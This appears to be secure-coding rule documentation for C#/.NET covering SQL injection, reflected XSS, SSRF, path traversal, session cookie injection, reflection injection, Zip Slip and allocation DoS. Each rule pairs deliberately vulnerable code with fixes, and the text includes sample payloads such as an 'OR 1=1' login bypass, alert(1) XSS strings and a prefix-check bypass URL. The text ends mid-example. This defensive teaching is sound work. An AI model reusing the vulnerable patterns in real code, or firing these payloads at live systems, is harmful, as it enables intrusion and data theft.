In cases where the application is deployed in a virtualized or otherwise contained environment, or where memory usage limits are in place, the consequences are limited to the vulnerable application only. In that case, other processes and applications hosted on the same server may keep on running without perturbation. The mainly affected application will still stop working properly.

In general, this kind of DoS attack can have severe financial consequences, which are particularly significant when the affected systems are business-critical.

How to fix it in .NET

Code examples

The following code is vulnerable to a memory allocation injection because the size of a memory allocation is determined from a user-controlled source. It then performs the allocation without any verification or sanitization of the provided size.

Noncompliant code example

[Route("NonCompliantArrayList")]
public string NonCompliantArrayList()
{
    int size;
    try
    {
        size = int.Parse(Request.Query["size"]);
    }
    catch (FormatException)
    {
        return "Number format exception while reading size";
    }
    ArrayList arrayList = new ArrayList(size); // Noncompliant
    return size + " bytes were allocated.";
}

Compliant solution

public const int MAX_ALLOC_SIZE = 1024;

[Route("CompliantArrayList")]
public string CompliantArrayList()
{
    int size;
    try
    {
        size = int.Parse(Request.Query["size"]);
    }
    catch (FormatException)
    {
        return "Number format exception while reading size";
    }
    size = Math.Min(size, MAX_ALLOC_SIZE);
    ArrayList arrayList = new ArrayList(size);
    return size + " bytes were allocated.";
}

How does this work?

Enforce an upper limit

When performing a memory allocation whose size depends on a user-controlled parameter, it is of prime importance to enforce an upper limit to the size being allocated. This will prevent any overly big memory slot from being consumed by a single allocation.

Note that forcing an upper limit will not prevent Denial of Service attacks. When an allocation size is restricted to a reasonable amount, attackers can still request the allocating feature multiple times until the combined allocation size becomes big enough to cause exhaustion. However, the smaller the allowed allocation size, the higher the number of necessary requests and, thus, the higher the required resources on the attacker's side. As with most DoS attack vectors, a trade-off must be found that prevents most attackers from causing exhaustion while keeping a good level of performance and usability.

Here, the example compliant code uses the Math.Min function to enforce a reasonable upper bound to the allocation size. In that case, no more than 1024 bytes can be allocated at a time.
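Note that Math.Min alone does not reject negative values, which would make the ArrayList constructor throw. A slightly more defensive sketch (the class name and bounds are illustrative, not part of the rule) clamps both ends of the range:

```csharp
using System;
using System.Collections;

public static class AllocationGuard
{
    public const int MaxAllocSize = 1024; // illustrative upper bound

    public static ArrayList AllocateBounded(int requestedSize)
    {
        // Math.Clamp rejects both oversized and negative requests in one step.
        int size = Math.Clamp(requestedSize, 0, MaxAllocSize);
        return new ArrayList(size);
    }
}
```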

Harden the execution environment configuration

As a defense in depth measure, it is advised to harden the execution environment configuration regarding memory usage. This can effectively reduce the scope of a successful Denial of Service attack and prevent a complete outage, potentially ranging over multiple applications.

When running the application in a contained environment, like a Docker container, it is usually possible to limit the amount of memory provided to the contained environment. In that case, memory exhaustion will only impact the application hosting container and not the host system.

When running the application directly on a physical or heavy virtualized server, memory limits can sometimes be set on the application’s associated service account. For example, the ulimit mechanism of Unix based operating systems can be used for that purpose. With such a limit set up, memory exhaustion only impacts the applications and processes owned by the related service account.

Resources

Documentation

  • OWASP - Denial of Service
  • Linux.org - pam_limits - PAM module to limit resources
  • RedHat - How to set limits for services in RHEL and systemd

Standards

roslyn.sonaranalyzer.security.cs:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their impact.
Most of the time, organizations overlook defense-in-depth measures because they assume attackers cannot reach certain points in the infrastructure. This oversight can enable multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Entity Framework Core

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

public class ExampleController : Controller
{
    private readonly UserAccountContext Context;

    public IActionResult Authenticate(string user, string pass)
    {
        var query = "SELECT * FROM users WHERE user = '" + user + "' AND pass = '" + pass + "'";

        // Assumes UserAccountContext exposes a DbSet<User> named Users (hypothetical).
        var queryResults = Context
            .Users
            .FromSqlRaw(query);

        if (!queryResults.Any())
        {
            return Unauthorized();
        }

        return Ok();
    }
}

Compliant solution

public class ExampleController : Controller
{
    private readonly UserAccountContext Context;

    public IActionResult Authenticate(string user, string pass)
    {
        var query = "SELECT * FROM users WHERE user = {0} AND pass = {1}";

        // Assumes UserAccountContext exposes a DbSet<User> named Users (hypothetical).
        var queryResults = Context
            .Users
            .FromSqlRaw(query, user, pass);

        if (!queryResults.Any())
        {
            return Unauthorized();
        }

        return Ok();
    }
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string, using positional placeholders:

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.
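Outside of Entity Framework Core, the same principle applies with plain ADO.NET: the query text contains only named placeholders, and the literals travel separately as parameters. A sketch, assuming the Microsoft.Data.SqlClient package and a users table matching the examples above:

```csharp
using Microsoft.Data.SqlClient;

public static class UserStore
{
    public static bool Authenticate(string user, string pass, string connectionString)
    {
        // The query logic is fixed; @user and @pass are parameters, not text.
        const string query =
            "SELECT COUNT(*) FROM users WHERE user = @user AND pass = @pass";

        using var connection = new SqlConnection(connectionString);
        using var command = new SqlCommand(query, connection);

        // The untrusted values never become part of the query text.
        command.Parameters.AddWithValue("@user", user);
        command.Parameters.AddWithValue("@pass", pass);

        connection.Open();
        return (int)command.ExecuteScalar() > 0;
    }
}
```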

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that their target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the victim's perspective. This may result in a loss of integrity and the theft of the legitimate user's data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in ASP.NET

Code examples

Noncompliant code example

using System.Web;
using System.Web.Mvc;

public class HelloController : Controller
{
    [HttpGet]
    public void Hello(string name, HttpResponse response)
    {
        string html = "<h1>Hello " + name + "</h1>";
        response.Write(html);
    }
}

Compliant solution

using System.Web;
using System.Web.Mvc;

public class HelloController : Controller
{
    [HttpGet]
    public void Hello(string name, HttpResponse response)
    {
        string html = "<h1>Hello " + HttpUtility.HtmlEncode(name) + "</h1>";
        response.Write(html);
    }
}

How does this work?

If the HTTP response is HTML code, it is highly recommended to use Razor-based view templates to generate it. This template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.

Encode data according to the HTML context

The best approach to protect against XSS is to systematically encode data that is written to HTML documents. The goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

XSS exploitation techniques vary depending on the HTML context where malicious input is injected. For each HTML context, there is a specific encoding to prevent JavaScript code from being interpreted. The following table summarizes the encoding to apply for each HTML context.

For each HTML context below, a vulnerable code example, an exploit example, and the encoding to apply are listed.

In between tags

Code example:

<!doctype html>
<div>
  { data }
</div>

Exploit example:

<!doctype html>
<div>
  <script>
    alert(1)
  </script>
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an attribute surrounded by single or double quotes

Code example:

<!doctype html>
<div tag="{ data }">
  ...
</div>

Exploit example:

<!doctype html>
<div tag=""
     onmouseover="alert(1)">
  ...
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an unquoted attribute

Code example:

<!doctype html>
<div tag={ data }>
  ...
</div>

Exploit example:

<!doctype html>
<div tag=foo
     onmouseover=alert(1)>
  ...
</div>

Dangerous context: HTML output encoding will not fully prevent XSS.

In a URL attribute

Code example:

<!doctype html>
<a href="{ data }">
  ...
</a>

Exploit example:

<!doctype html>
<a href="javascript:alert(1)">
  ...
</a>

Validate the URL by parsing the data. Make sure relative URLs start with a / and that absolute URLs use https as their scheme.

In a script block

Code example:

<!doctype html>
<script>
  { data }
</script>

Exploit example:

<!doctype html>
<script>
  alert(1)
</script>

Dangerous context: HTML output encoding will not fully prevent XSS. To pass values to a JavaScript context, the recommended way is to use a data attribute:

<!doctype html>
<script data="{ data }">
  ...
</script>

System.Web.HttpUtility.HtmlEncode is the recommended method to encode HTML entities.
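A minimal usage sketch of that method (the input value is illustrative):

```csharp
using System;
using System.Web;

class HtmlEncodingDemo
{
    static void Main()
    {
        string untrusted = "<script>alert(1)</script>";

        // HtmlEncode turns markup-significant characters into HTML entities,
        // so browsers render them as text instead of interpreting them.
        string safe = HttpUtility.HtmlEncode(untrusted);

        Console.WriteLine(safe); // &lt;script&gt;alert(1)&lt;/script&gt;
    }
}
```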

Pitfalls

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent an XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time before malicious users find an exploitation payload that defeats the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of javascript: URIs.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
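As a hedged sketch of how such a header could be set in an ASP.NET Core pipeline (the policy value and endpoint are illustrative; a real policy must match the application's actual resource origins):

```csharp
// Minimal ASP.NET Core sketch: send a restrictive CSP header with every
// response so browsers refuse to run injected inline scripts.
var builder = WebApplication.CreateBuilder(args);
var app = builder.Build();

app.Use(async (context, next) =>
{
    // 'self' restricts scripts, styles, etc. to the application's own origin;
    // inline <script> blocks injected via XSS are blocked by default.
    context.Response.Headers["Content-Security-Policy"] = "default-src 'self'";
    await next();
});

app.MapGet("/", () => "Hello");
app.Run();
```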

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

roslyn.sonaranalyzer.security.cs:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can be either basic or blind, depending on whether the server's fetched data is directly returned in the web application's response.
Even when the application does not return the response of the coerced request (blind SSRF), exploitation remains possible, so blind SSRF must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internally accessible ports on the affected server, or on other hosts the server can communicate with, by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in ASP.NET

Code examples

The following code is vulnerable to SSRF as it performs an HTTP request to a URL defined by untrusted data.

Noncompliant code example

using System.Net;
using System.Web;
using System.Web.Mvc;

public class ExampleController: Controller
{
    [HttpGet]
    public IActionResult ImageFetch(string location)
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(location);

        return Ok();
    }
}

Compliant solution

using System.Linq;
using System.Net;
using System.Web;
using System.Web.Mvc;

public class ExampleController: Controller
{
    private readonly string[] allowedSchemes = { "https" };
    private readonly string[] allowedDomains = { "trusted1.example.com", "trusted2.example.com" };

    [HttpGet]
    public IActionResult ImageFetch(string location)
    {
        Uri uri = new Uri(location);

        // Reject the request if either the scheme or the host is not allowed.
        if (!allowedSchemes.Contains(uri.Scheme) || !allowedDomains.Contains(uri.Host))
        {
            return BadRequest();
        }

        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);

        return Ok();
    }
}

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like StartsWith("https://example.com"), or an equivalent regex such as ^https://example\.com.*, can be exploited with the following URL: https://example.commit.malicious.io.
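The difference between the naive prefix check, the terminated prefix check, and a parsed-host comparison can be demonstrated directly (the hostnames are illustrative):

```csharp
using System;

class PrefixTrapDemo
{
    static void Main()
    {
        string malicious = "https://example.commit.malicious.io/steal";

        // Naive prefix check: passes, because the trusted prefix lacks a
        // terminating path separator.
        bool naive = malicious.StartsWith("https://example.com",
                                          StringComparison.Ordinal);

        // Safer: require the separator, or better, compare the parsed host.
        bool withSlash = malicious.StartsWith("https://example.com/",
                                              StringComparison.Ordinal);
        bool hostCheck = new Uri(malicious).Host == "example.com";

        Console.WriteLine($"{naive} {withSlash} {hostCheck}"); // True False False
    }
}
```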

Resources

Standards

roslyn.sonaranalyzer.security.cs:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in .NET

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to delete arbitrary files.

Noncompliant code example

public class ExampleController : Controller
{
    private static string TargetDirectory = "/path/to/target/directory/";

    public void Example(string filename)
    {
        string path = Path.Combine(TargetDirectory, filename);
        System.IO.File.Delete(path);
    }
}

Compliant solution

public class ExampleController : Controller
{
    private static string TargetDirectory = "/path/to/target/directory/";

    public void Example(string filename)
    {
        string path = Path.Combine(TargetDirectory, filename);
        string canonicalDestinationPath = Path.GetFullPath(path);

        if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
        {
            System.IO.File.Delete(canonicalDestinationPath);
        }
    }
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like System.IO.Path.GetFullPath. This resolves relative paths and path components like ../ and removes any ambiguity regarding the file's location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string TargetDirectory does not end with a path separator:

private static string TargetDirectory = "/Users/John";

public void Example(string filename)
{
    string canonicalDestinationPath = Path.GetFullPath(filename);

    if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
    {
        System.IO.File.Delete(canonicalDestinationPath);
    }
}

This check can be bypassed because "/Users/Johnny/file".StartsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.


Do not use Path.Combine as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.
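A short demonstration of this behavior (the paths are illustrative; on Windows, a leading separator also counts as rooted, so the result is the same):

```csharp
using System;
using System.IO;

class PathCombineTrapDemo
{
    static void Main()
    {
        // Because the second argument is rooted, the trusted base directory
        // is silently discarded by Path.Combine.
        string path = Path.Combine("/path/to/target/directory/", "/etc/passwd");

        Console.WriteLine(path); // /etc/passwd
    }
}
```

This is why Path.Combine must be followed by canonicalization and a prefix check, as in the compliant solution above, rather than being trusted to keep the result inside the base directory.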

Resources

Standards

roslyn.sonaranalyzer.security.cs:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling them enables control over users' identities within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim enters sensitive data within the attacker's application session, which the attacker can later retrieve. The implications vary with the type of data disclosed: a leak of strictly confidential user data has a different impact than a leak of organizational data.

Vulnerability chaining

An attacker not only manipulates a user into browsing the application with a session cookie under the attacker's control but also detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker's session and is affected by the XSS, which can then be used for a wide range of attacks, including credential stealing via mirrored login pages.

How to fix it in ASP.NET

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

using Microsoft.AspNetCore.Mvc;

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult CheckCookie(string cookie)
    {
        if (Request.Cookies["ASP.NET_SessionId"] == null)
        {
            Response.Cookies.Append("ASP.NET_SessionId", cookie);
        }

        return View("Welcome");
    }
}

Compliant solution

using Microsoft.AspNetCore.Mvc;

public class ExampleController : Controller
{
    [HttpGet]
    public IActionResult CheckCookie()
    {
        if (Request.Cookies["ASP.NET_SessionId"] == null)
        {
            return View("GetCookie");
        }

        return View("Welcome");
    }
}

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.
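To illustrate the built-in-API principle: session identifiers must be generated server-side from a cryptographically secure source, never taken from request data. A minimal Java sketch (not the report's ASP.NET API; names are illustrative):

```java
import java.security.SecureRandom;
import java.util.Base64;

public class SessionTokens {
    private static final SecureRandom RANDOM = new SecureRandom();

    // Generates an unpredictable session identifier on the server.
    // Frameworks do this internally; a session id must never be taken
    // from request parameters.
    static String newSessionId() {
        byte[] bytes = new byte[32]; // 256 bits of entropy
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    public static void main(String[] args) {
        System.out.println(newSessionId());
    }
}
```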

Resources

Standards

roslyn.sonaranalyzer.security.cs:S6173

Why is this an issue?

Reflection injections occur in a web application when it retrieves data from a user or a third-party service and fully or partially uses it to inspect, load or invoke a component by name.

If an application uses a reflection method in a way that is vulnerable to injections, it is exposed to attacks that aim to achieve remote code execution on the server’s website.

A user with malicious intent exploits this by carefully crafting a string referencing symbols such as class or method names, changing the initial reflection logic into an impactful malicious one.

After crafting and triggering the malicious request, the attacker can attack servers affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

If user-supplied values are used to choose which code is executed, an attacker may be able to supply carefully-chosen values that cause unexpected code to run. The attacker can use this ability to run arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting a seemingly legitimate object whose properties might be used maliciously.

Depending on the application, attackers might be able to modify important data structures or content to escalate privileges or perform unwanted actions. For example, with an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in .NET

Code examples

In the following example, the code simulates a feature in an image editing application that allows users to install plugins to add new filters or effects. It assumes the user will give a known name, such as "SepiaEffect".

Noncompliant code example

public class ExampleController : Controller
{
    public IActionResult Apply(string EffectName)
    {
        var EffectInstance  = Activator.CreateInstance(null, EffectName); // Noncompliant
        object EffectPlugin = EffectInstance.Unwrap();

        if ( ((IEffect)EffectPlugin).ApplyFilter() )
        {
            return Ok();
        }
        else
        {
            return Problem();
        }
    }
}

public interface IEffect
{
    bool ApplyFilter();
}

Compliant solution

public class ExampleController : Controller
{
    private static readonly string[] EFFECT_ALLOW_LIST = {
        "SepiaEffect",
        "BlackAndWhiteEffect",
        "WaterColorEffect",
        "OilPaintingEffect"
    };

    public IActionResult Apply(string EffectName)
    {
        if (!EFFECT_ALLOW_LIST.Contains(EffectName))
        {
            return BadRequest("Invalid effect name. The effect is not allowed.");
        }

        var EffectInstance  = Activator.CreateInstance(null, EffectName);
        object EffectPlugin = EffectInstance.Unwrap();

        if ( ((IEffect)EffectPlugin).ApplyFilter() )
        {
            return Ok();
        }
        else
        {
            return Problem();
        }
    }
}

public interface IEffect
{
    bool ApplyFilter();
}

How does this work?

Pre-Approved commands

The cleanest way to avoid this defect is to validate the input before using it in a reflection method.

Create a list of authorized and secure classes that you want the application to be able to execute.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must perform this validation on the server side, not on client-side front-ends.
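The allow-list approach can be made concrete with a minimal Java sketch of server-side validation before a reflective instantiation (the listed class names are illustrative stand-ins, not the report's effect plugins):

```java
import java.util.Set;

public class PluginLoader {
    // Allow-list of fully qualified class names the application may
    // instantiate; anything else is rejected before reflection runs.
    private static final Set<String> ALLOWED = Set.of(
        "java.lang.StringBuilder",
        "java.util.ArrayList"
    );

    static Object load(String className) {
        if (!ALLOWED.contains(className)) {
            throw new IllegalArgumentException("Class not allowed: " + className);
        }
        try {
            return Class.forName(className).getDeclaredConstructor().newInstance();
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Instantiation failed: " + className, e);
        }
    }

    public static void main(String[] args) {
        System.out.println(load("java.util.ArrayList").getClass().getName());
    }
}
```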

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive they control.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in .NET

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

public class ExampleController : Controller
{
    private static string TargetDirectory = "/example/directory/";

    public void ExtractEntry(IEnumerator<ZipArchiveEntry> entriesEnumerator)
    {
        ZipArchiveEntry entry = entriesEnumerator.Current;
        string destinationPath = Path.Combine(TargetDirectory, entry.FullName);

        entry.ExtractToFile(destinationPath);
    }
}

Compliant solution

public class ExampleController : Controller
{
    private static string TargetDirectory = "/example/directory/";

    public void ExtractEntry(IEnumerator<ZipArchiveEntry> entriesEnumerator)
    {
        ZipArchiveEntry entry = entriesEnumerator.Current;
        string destinationPath = Path.Combine(TargetDirectory, entry.FullName);
        string canonicalDestinationPath = Path.GetFullPath(destinationPath);

        if (canonicalDestinationPath.StartsWith(TargetDirectory, StringComparison.Ordinal))
        {
            entry.ExtractToFile(canonicalDestinationPath);
        }
    }
}

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follows:

  1. Resolve the canonical path of the file by using methods like System.IO.Path.GetFullPath or System.IO.Path.GetFileName. This resolves relative path components like ../ and removes any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
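The three steps above can be sketched in Java (java.nio used for illustration; the directory path is hypothetical):

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class ZipSlipCheck {
    // Returns the canonical destination for an archive entry, or null
    // when the resolved path escapes the target directory (Zip Slip).
    static Path safeDestination(String targetDir, String entryName) {
        Path canonicalTarget = Paths.get(targetDir).toAbsolutePath().normalize();
        Path destination = canonicalTarget.resolve(entryName).normalize();
        // Path.startsWith compares whole name components, so
        // "/base/dirmalicious" does not start with "/base/dir".
        return destination.startsWith(canonicalTarget) ? destination : null;
    }

    public static void main(String[] args) {
        System.out.println(safeDestination("/example/directory", "notes/readme.txt"));
        System.out.println(safeDestination("/example/directory", "../../etc/passwd")); // null
    }
}
```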

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string TargetDirectory does not end with a path separator:

static private String TargetDirectory = "/Users/John";

public void ExtractEntry(IEnumerator<ZipArchiveEntry> entriesEnumerator)
{
    ZipArchiveEntry entry = entriesEnumerator.Current;
    string destinationPath = Path.Combine(TargetDirectory, entry.FullName);
    string canonicalDestinationPath = Path.GetFullPath(destinationPath);

